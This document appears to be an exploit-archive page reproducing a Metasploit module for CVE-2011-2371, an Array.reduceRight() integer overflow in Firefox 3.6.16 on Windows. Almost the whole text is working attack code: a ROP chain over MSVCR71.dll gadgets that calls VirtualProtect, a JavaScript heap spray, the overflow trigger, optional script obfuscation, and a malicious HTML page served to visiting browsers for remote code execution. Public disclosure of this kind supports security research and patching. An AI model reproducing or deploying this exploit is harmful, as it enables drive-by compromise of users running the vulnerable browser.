Mozilla Firefox Array.reduceRight() Integer Overflow



EKU-ID: 1133 CVE: 2011-2371 OSVDB-ID:
Author: Chris Rohlf Published: 2011-10-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# $Id: mozilla_reduceright.rb 13909 2011-10-13 03:16:15Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = AverageRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info={})
  super(update_info(info,
   'Name'           => "Mozilla Firefox Array.reduceRight() Integer Overflow",
   'Description'    => %q{
     This module exploits a vulnerability found in Mozilla Firefox 3.6. When an
    array object is configured with a large length value, the reduceRight() method
    may cause an invalid index being used, allowing abitrary remote code execution.
    Please note that the exploit requires a longer amount of time (compare to a
    typical browser exploit) in order to gain control of the machine.
   },
   'License'        => MSF_LICENSE,
   'Version'        => "$Revision: 13909 $",
   'Author'         =>
    [
     'Chris Rohlf',    #Matasano Security (Initial discovery according to Mozilla.org)
     'Yan Ivnitskiy',  #Matasano Security (Initial discovery with Chris?)
     'Matteo Memelli', #PoC from Exploit-DB
     'dookie2000ca',   #"Helping" ryujin (Matteo)
     'sinn3r',         #Metasploit
    ],
   'References'     =>
    [
     ['CVE', '2011-2371'],
     ['URL', 'http://http://www.exploit-db.com/exploits/17974/'],
     ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=664009']
    ],
   'Payload'        =>
    {
     'BadChars'        => "\x00",
     'PrependEncoder'  => "\xbc\x0c\x0c\x0c\x0c",
    },
   'DefaultOptions'  =>
    {
     'ExitFunction' => "process",
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     #Windows XP / Vista / 7
     [ 'Mozilla Firefox 3.6.16', {} ],
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Jun 21 2011",
   'DefaultTarget'  => 0
  ))

  register_options(
   [
    OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
   ], self.class)
 end

 def junk
  return rand_text_alpha(4).unpack("L")[0].to_i
 end

 def on_request_uri(cli, request)

  agent = request.headers['User-Agent']
  if agent !~ /Firefox\/3\.6\.[16|17]/
   vprint_error("This browser is not supported: #{agent.to_s}")
   send_not_found(cli)
   return
  end

  #mona.py tekniq! + Payload
  rop = [
   0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
   0x7c37a140,  # Make EAX readable
   0x7c37591f,  # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
   0x7c348b06,  # EBP (NOP)
   0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
   0x7c37a140,  # <- VirtualProtect() found in IAT
   0x7c3530ea,  # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
   0x7c346c0b,  # Slide, so next gadget would write to correct stack location
   0x7c376069,  # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
   0x7c348b06,  # EDI (filler)
   0x7c348b06,  # will be patched at runtime (VP), then picked up into ESI
   0x7c348b06,  # EBX (filler)
   0x7c376402,  # POP EBP # RETN (msvcr71.dll)
   0x7c345c30,  # ptr to push esp #  ret  (from MSVCR71.dll)
   0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
   0xfffff82f,  # size 20001 bytes
   0x7c351e05,  # NEG EAX # RETN (MSVCR71.dll)
   0x7c354901,  # POP EBX # RETN (MSVCR71.dll)
   0xffffffff,  # pop value into ebx
   0x7c345255,  # INC EBX # FPATAN # RETN (MSVCR71.dll)
   0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
   0x7c34d201,  # POP ECX # RETN (MSVCR71.dll)
   0x7c38b001,  # RW pointer (lpOldProtect) (-> ecx)
   0x7c34b8d7,  # POP EDI # RETN (MSVCR71.dll)
   0x7c34b8d8,  # ROP NOP (-> edi)
   0x7c344f87,  # POP EDX # RETN (MSVCR71.dll)
   0xffffffc0,  # value to negate, target value : 0x00000040, target: edx
   0x7c351eb1,  # NEG EDX # RETN (MSVCR71.dll)
   0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
   0x90909090,  # NOPS (-> eax)
   0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
  ].pack('V*')

  table = [0x4141].pack('v*')
  table << [
   0x0c000048,
   junk,
   junk,
   junk,
   junk,
   junk,
   junk,
   junk,
   junk,
  ].pack('V*')
  table << [0x4141].pack('v*')
  table << [
   0x7c370eef,
   junk,
  ].pack('V*')
  table << [0x4141].pack('v*')
  table << [
   0x3410240c,
   0x0c00007c,
   junk,
   junk,
   junk,
   junk,
   junk,
   junk,
   junk,
   junk,
   junk,
   junk,
   junk,
   junk,
   0x0c00002e
  ].pack('V*')

  p = payload.encoded
  arch = Rex::Arch.endian(target.arch)
  js_payload = Rex::Text.to_unescape(rop + p, arch)
  js_ptrs    = Rex::Text.to_unescape(table, arch)

  #Pretty much based on Matteo's code except for the size adjustment to avoid a busted heap
  js = <<-JS
  var applet = document.getElementById('MyApplet');

  function spray() {
   var ptrs = unescape("#{js_ptrs}");

   var bheader  = 0x12/2;
   var nullt    = 0x2/2;

   var espoffset  = (7340 /2) - ptrs.length;
   var esppadding = unescape("%u0c0c%u0c0c");
   while(esppadding.length < espoffset) esppadding += esppadding;
   esppadding = esppadding.substring(0, espoffset);

   var payload = unescape("#{js_payload}");

   var tr_padding = unescape("%u0c0c%u0c0c");
   while (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}

   var dummy = ptrs + esppadding + payload + tr_padding;
   var hspray = dummy.substring(0,0x7fa00 - bheader - nullt);

   HeapBlocks = new Array()
   for (i=0;i<0x60;i++){
    HeapBlocks[i] += hspray;
   }
  }
  spray();
  obj = new Array;
  obj.length = 2197815302;
  f = function trigger(prev, myobj, indx, array) {
   alert(myobj[0]);
  }
  obj.reduceRight(f,1,2,3);
  JS

  js = js.gsub(/^\t\t/, '')

  if datastore['OBFUSCATE']
   js = ::Rex::Exploitation::JSObfu.new(js)
   js.obfuscate
  end

  html = <<-HTML
  <html>
  <head>
  </head>
  <body>
  <APPLET id="MyApplet" code="trigger.class" width=150 height=50>
  You need a Java-enabled browser to pwn this.
  </APPLET>
  <script>
  #{js}
  </script>
  </body>
  <html>
  HTML

  print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
  send_response(cli, html, {'Content-Type'=>'text/html'})
 end
end